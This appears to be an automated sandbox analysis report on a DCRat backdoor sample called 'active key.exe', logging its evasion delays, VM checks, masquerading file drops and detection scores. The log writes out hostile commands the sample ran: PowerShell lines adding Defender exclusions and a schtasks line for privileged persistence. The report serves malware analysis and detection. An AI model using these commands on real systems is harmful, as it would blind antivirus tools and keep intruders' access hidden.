                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe TID: 7912Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe TID: 7992Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 7556Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -45194522980588373s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -599885s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -599781s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -599672s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -599562s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -599426s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -599267s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -599141s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -598940s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 3248Thread sleep time: -3600000s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -598828s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -598719s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -598609s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -598500s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -598390s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -598280s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -598159s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -598047s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -597935s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -597827s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -597719s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -597605s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -597500s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -597383s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -597272s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -597156s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -597044s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -596934s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -596806s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -596701s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -596594s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -596469s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -596341s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -596234s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -596123s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -595999s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -595890s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -595776s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -595672s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -595547s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -595437s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -595317s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -595200s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -595078s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -594968s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -594855s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -594748s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -594535s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -593719s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -593589s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -593484s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 6400Thread sleep time: -592930s >= -30000s
                    Source: C:\Windows\System32\ntoskrnl2.exe TID: 8160Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe TID: 8152Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe TID: 8168Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\ntoskrnl2.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 30000
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 600000
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 599885
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 599781
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 599672
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 599562
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 599426
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 599267
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 599141
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 598940
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 3600000
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 598828
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 598719
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 598609
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 598500
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 598390
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 598280
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 598159
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 598047
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 597935
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 597827
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 597719
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 597605
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 597500
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 597383
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 597272
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 597156
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 597044
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 596934
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 596806
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 596701
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 596594
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 596469
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 596341
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 596234
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 596123
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 595999
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 595890
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 595776
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 595672
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 595547
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 595437
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 595317
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 595200
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 595078
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 594968
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 594855
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 594748
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 594535
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 593719
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 593589
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 593484
                    Source: C:\Windows\System32\ntoskrnl2.exe Thread delayed: delay time: 592930
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\ntoskrnl2.exe File opened: C:\Users\user\AppData
                    Source: C:\Windows\System32\ntoskrnl2.exe File opened: C:\Users\user\AppData\Local
                    Source: C:\Windows\System32\ntoskrnl2.exe File opened: C:\Users\user
                    Source: C:\Windows\System32\ntoskrnl2.exe File opened: C:\Users\user\Documents\desktop.ini
                    Source: C:\Windows\System32\ntoskrnl2.exe File opened: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Windows\System32\ntoskrnl2.exe File opened: C:\Users\user\AppData\Local\Temp
                    Source: active key.exe, 00000000.00000002.2261621368.000002CBC84A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: ntoskrnl2.exe, 00000005.00000002.2385139643.000000001BDC6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: active key.exe, 00000000.00000002.2261621368.000002CBC84A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: active key.exe, 00000000.00000002.2261621368.000002CBC84A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef00
                    Source: active key.exe, 00000000.00000003.2258183311.000002CBC84A9000.00000004.00000020.00020000.00000000.sdmp, active key.exe, 00000000.00000002.2261621368.000002CBC84A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\active key.exe Process information queried: ProcessInformation
                    Source: C:\Windows\System32\ntoskrnl2.exe Process token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe Process token adjusted: Debug
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe Process token adjusted: Debug
                    Source: C:\Windows\System32\ntoskrnl2.exe Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Windows\System32\ntoskrnl2.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe'
                    Source: C:\Windows\System32\ntoskrnl2.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\tracing\fontdrvhost.exe'
                    Source: C:\Windows\System32\ntoskrnl2.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe'
                    Source: C:\Windows\System32\ntoskrnl2.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe'
                    Source: C:\Windows\System32\ntoskrnl2.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Pictures\backgroundTaskHost.exe'
                    Source: C:\Windows\System32\ntoskrnl2.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\ntoskrnl2.exe'
                    Source: C:\Users\user\Desktop\active key.exe NtProtectVirtualMemory: Indirect: 0x7FF6E99F21C0
                    Source: C:\Users\user\Desktop\active key.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c mode con cols=55 lines=15
                    Source: C:\Users\user\Desktop\active key.exe Process created: C:\Windows\System32\ntoskrnl2.exe "C:\Windows\System32\ntoskrnl2.exe"
                    Source: C:\Users\user\Desktop\active key.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\active key.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mode.com mode con cols=55 lines=15
                    Source: C:\Windows\System32\ntoskrnl2.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "XUkPLaESKIkbWXdxlvmVntDvX" /sc MINUTE /mo 6 /tr "'C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe'" /rl HIGHEST /f
                    Source: C:\Windows\System32\ntoskrnl2.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\rtOHKAESQQ.bat"
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -hashfile "C:\Users\user\Desktop\active key.exe" MD5
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i /v "md5"
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i /v "certutil"
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: C:\Windows\System32\ntoskrnl2.exe Queries volume information: C:\Windows\System32\ntoskrnl2.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe Queries volume information: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe VolumeInformation
                    Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\ntoskrnl2.exe Queries volume information: C:\Windows\System32\ntoskrnl2.exe VolumeInformation
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe Queries volume information: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe VolumeInformation
                    Source: C:\Windows\System32\ntoskrnl2.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara match File source: 00000005.00000002.2321413390.00000000128BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: ntoskrnl2.exe PID: 5012, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: XUkPLaESKIkbWXdxlvmVntDv.exe PID: 7672, type: MEMORYSTR
                    Source: Yara match File source: 5.2.ntoskrnl2.exe.1b180000.4.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 5.2.ntoskrnl2.exe.1b180000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000005.00000002.2347592089.000000001B180000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                    Remote Access Functionality

                    Source: Yara match File source: 00000005.00000002.2321413390.00000000128BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: ntoskrnl2.exe PID: 5012, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: XUkPLaESKIkbWXdxlvmVntDv.exe PID: 7672, type: MEMORYSTR
                    Source: Yara match File source: 5.2.ntoskrnl2.exe.1b180000.4.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 5.2.ntoskrnl2.exe.1b180000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000005.00000002.2347592089.000000001B180000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information1
                    Scripting
                    Valid Accounts11
                    Windows Management Instrumentation
                    1
                    Scripting
                    1
                    Abuse Elevation Control Mechanism
                    11
                    Disable or Modify Tools
                    1
                    Credential API Hooking
                    2
                    File and Directory Discovery
                    Remote Services12
                    Archive Collected Data
                    12
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts2
                    Command and Scripting Interpreter
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    1
                    Deobfuscate/Decode Files or Information
                    LSASS Memory114
                    System Information Discovery
                    Remote Desktop Protocol1
                    Credential API Hooking
                    2
                    Non-Application Layer Protocol
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Scheduled Task/Job
                    1
                    Scheduled Task/Job
                    11
                    Process Injection
                    1
                    Abuse Elevation Control Mechanism
                    Security Account Manager21
                    Security Software Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive13
                    Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    Scheduled Task/Job
                    1
                    Obfuscated Files or Information
                    NTDS1
                    Process Discovery
                    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                    Software Packing
                    LSA Secrets31
                    Virtualization/Sandbox Evasion
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading
                    Cached Domain Credentials1
                    Application Window Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items233
                    Masquerading
                    DCSync1
                    Remote System Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                    Virtualization/Sandbox Evasion
                    Proc Filesystem1
                    System Network Configuration Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                    Process Injection
                    /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    Behavior Graph (figure not reproduced): ID: 1502880, Sample: active key.exe, Startdate: 02/09/2024, Architecture: WINDOWS, Score: 100

                    Source | Detection | Scanner | Label | Link
                    active key.exe | 68% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat |
                    active key.exe | 68% | Virustotal | | Browse
                    active key.exe | 100% | Avira | TR/Black.Gen2 |
                    active key.exe | 100% | Joe Sandbox ML | |
                    Source | Detection | Scanner | Label | Link
                    C:\Users\Public\Pictures\backgroundTaskHost.exe | 100% | Avira | TR/Dropper.Gen |
                    C:\Users\user\Desktop\ZHsakaRB.log | 100% | Avira | HEUR/AGEN.1300079 |
                    C:\Windows\System32\ntoskrnl2.exe | 100% | Avira | TR/Dropper.Gen |
                    C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe | 100% | Avira | TR/Dropper.Gen |
                    C:\Users\user\AppData\Local\Temp\rtOHKAESQQ.bat | 100% | Avira | BAT/Delbat.C |
                    C:\Users\user\Desktop\mlzPodne.log | 100% | Avira | HEUR/AGEN.1300079 |
                    C:\Windows\tracing\fontdrvhost.exe | 100% | Avira | TR/Dropper.Gen |
                    C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe | 100% | Avira | TR/Dropper.Gen |
                    C:\Users\Public\Pictures\backgroundTaskHost.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\Desktop\ZHsakaRB.log | 100% | Joe Sandbox ML | |
                    C:\Windows\System32\ntoskrnl2.exe | 100% | Joe Sandbox ML | |
                    C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\Desktop\hCHhiobl.log | 100% | Joe Sandbox ML | |
                    C:\Users\user\Desktop\UZXJUHSP.log | 100% | Joe Sandbox ML | |
                    C:\Users\user\Desktop\mlzPodne.log | 100% | Joe Sandbox ML | |
                    C:\Windows\tracing\fontdrvhost.exe | 100% | Joe Sandbox ML | |
                    C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe | 100% | Joe Sandbox ML | |
                    C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat |
                    C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe | 75% | Virustotal | | Browse
                    C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat |
                    C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe | 75% | Virustotal | | Browse
                    C:\Users\Public\Pictures\backgroundTaskHost.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat |
                    C:\Users\Public\Pictures\backgroundTaskHost.exe | 75% | Virustotal | | Browse
                    C:\Users\user\Desktop\DnHERPdP.log | 29% | ReversingLabs | |
                    C:\Users\user\Desktop\DnHERPdP.log | 29% | Virustotal | | Browse
                    C:\Users\user\Desktop\UZXJUHSP.log | 8% | ReversingLabs | |
                    C:\Users\user\Desktop\UZXJUHSP.log | 11% | Virustotal | | Browse
                    C:\Users\user\Desktop\ZHsakaRB.log | 21% | ReversingLabs | |
                    C:\Users\user\Desktop\ZHsakaRB.log | 28% | Virustotal | | Browse
                    C:\Users\user\Desktop\aAtQiRdB.log | 29% | ReversingLabs | |
                    C:\Users\user\Desktop\aAtQiRdB.log | 29% | Virustotal | | Browse
                    C:\Users\user\Desktop\hCHhiobl.log | 8% | ReversingLabs | |
                    C:\Users\user\Desktop\hCHhiobl.log | 11% | Virustotal | | Browse
                    C:\Users\user\Desktop\mlzPodne.log | 21% | ReversingLabs | |
                    C:\Users\user\Desktop\mlzPodne.log | 28% | Virustotal | | Browse
                    C:\Windows\System32\ntoskrnl2.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat |
                    C:\Windows\System32\ntoskrnl2.exe | 75% | Virustotal | | Browse
                    C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat |
                    C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe | 75% | Virustotal | | Browse
                    C:\Windows\tracing\fontdrvhost.exe | 88% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat |
                    C:\Windows\tracing\fontdrvhost.exe | 75% | Virustotal | | Browse
                    No Antivirus matches
                    Source | Detection | Scanner | Label | Link
                    keyauth.win | 0% | Virustotal | | Browse
                    128538cm.n9shteam3.top | 13% | Virustotal | | Browse
                    Source | Detection | Scanner | Label | Link
                    http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
